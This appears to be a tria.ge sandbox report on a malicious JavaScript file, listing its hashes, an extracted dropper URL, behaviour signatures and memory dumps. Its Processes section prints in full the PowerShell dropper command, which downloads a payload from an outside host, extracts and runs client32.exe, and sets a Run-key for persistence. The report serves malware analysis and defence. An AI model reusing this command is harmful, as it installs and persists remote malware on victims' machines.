Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

232123212321.js

windows7-x64

10

232123212321.js

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20230712-en
  • resource tags

    arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
  • submitted
    29/08/2023, 08:27

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    232123212321.js

  • Size

    3KB

  • MD5

    55b69c07b1ba60eb1dd5f602a503c8a8

  • SHA1

    f52c545c39628c813234d509a6a52decdf320464

  • SHA256

    08e4dadf294dad1072e37c8979e394055ce176c940e36f47895c2929efb24125

  • SHA512

    2f30c9cac5d4e0de019fd03e4cee935baf5d1d048923215d5a53e96028a675c4ddcf0f3e3e9ad8942d0c2118fc5659f23b9b20295e00185af73c1fe6ef576673

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://instalfrio.cl/destination.txt
exe.dropper

http://instalfrio.cl/destination.txt

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\232123212321.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1516
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C "$u='http://instalfrio.cl/destination.txt';$6=(New-Object System.Net.WebClient).DownloadString($u);$a=[System.Convert]::FromBase64String($6);$d=[System.Environment]::GetFolderPath('ApplicationData')+'\D';if (!(Test-Path $d -PathType Container)) { New-Item -Path $d -ItemType Directory };$p=Join-Path $d 'p.zip';[System.IO.File]::WriteAllBytes($p,$a);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$d)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $d 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$s=$d+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='X';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2124

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2124-4-0x000000001B2D0000-0x000000001B5B2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2124-5-0x0000000001D80000-0x0000000001D88000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2124-6-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2124-7-0x0000000002940000-0x00000000029C0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2124-8-0x0000000002940000-0x00000000029C0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2124-9-0x0000000002940000-0x00000000029C0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2124-10-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2124-11-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2124-12-0x0000000002940000-0x00000000029C0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2124-13-0x0000000002940000-0x00000000029C0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2124-14-0x0000000002940000-0x00000000029C0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2124-15-0x0000000002940000-0x00000000029C0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2124-16-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

    Filesize

    9.6MB

    Download